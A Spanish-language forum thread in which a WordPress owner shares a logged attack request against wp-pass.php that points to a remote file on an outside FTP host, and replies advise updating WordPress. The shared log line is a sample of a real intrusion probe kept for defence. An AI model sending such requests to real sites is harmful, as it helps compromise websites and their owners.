Cómo proteger mi sitio Wordpress de posibles ataques

Hola
Revisando las visitas recientes me encuentro esto:
"//wp-pass.php?_wp_http_referer=ftp://200.24.109.166/SDClass/hot.txt??
Http Code: 302 Date: Feb 26 23:20:02 Http Version: HTTP/1.1 Size in Bytes: 437
Referer: -
Agent: Mozilla/3.0 (compatible; Indy Library)"

Lo que me parecio muy extraño, averigue un poco, al parecer se trata de que intentaron de redirigir asi otro lado, segun consulto en la web, wp-pass.php tenia una vulnerabilidad en la version 2.2.2, yo tengo la 2.9.2, ignoro si lo lograron, el caso es que una de las posibles soluciones, para evitar el ataque es añadir al final del .htacces lo siguiente:


lo anterior lo vi en .htaccess to prevent wp-pass.php redirects
Yo no se mucho de esas cosas, pero el codigo para añadir al .htaccess, lo veo logico, ya que evita que se escriba una redirección para el wp-pass.
La ip a la que buscaban redirigir, es conocida como de spammers, al menos eso sale al buscar información.

La redirrecion 302, es temporal, asi que no se si lo lograron o no puesto que mi web esta normal en este momento.

No se mucho más de lo que escribo aqui, pero si a alguien le sirve, lo dejo escrito.

No entiendo como puede haber gente que destina su tiempo en intentar ingresa y hackear sitios, por suerte nunca me paso pero se me hace que cuando utlizamos contenido dinamico en php y mas aun aplicaciones superconocidas como wordpress estamos vulnerables a este tipo de gente con malas intenciones.

Querian bypassear el archivo wp-pass.php para poder ownear la web xD

Como es posible que todavia esten en eso, hace como 5 años es lo mismo, pero al parecer no les funcionó por que no se sobreescribio en la lectura, si tienes la versión antigua al 2.9 de WP te sugiero que la actualices, hay inyecciones SQLi que pueden hacerte daños, subiendo un archivo llamado Shell, pero para que alimentar "kakers".

Actualiza 😀

FakeDark:
Muchas Gracias, yo tengo instalada la 2.9.2, supongo que eso ayudo.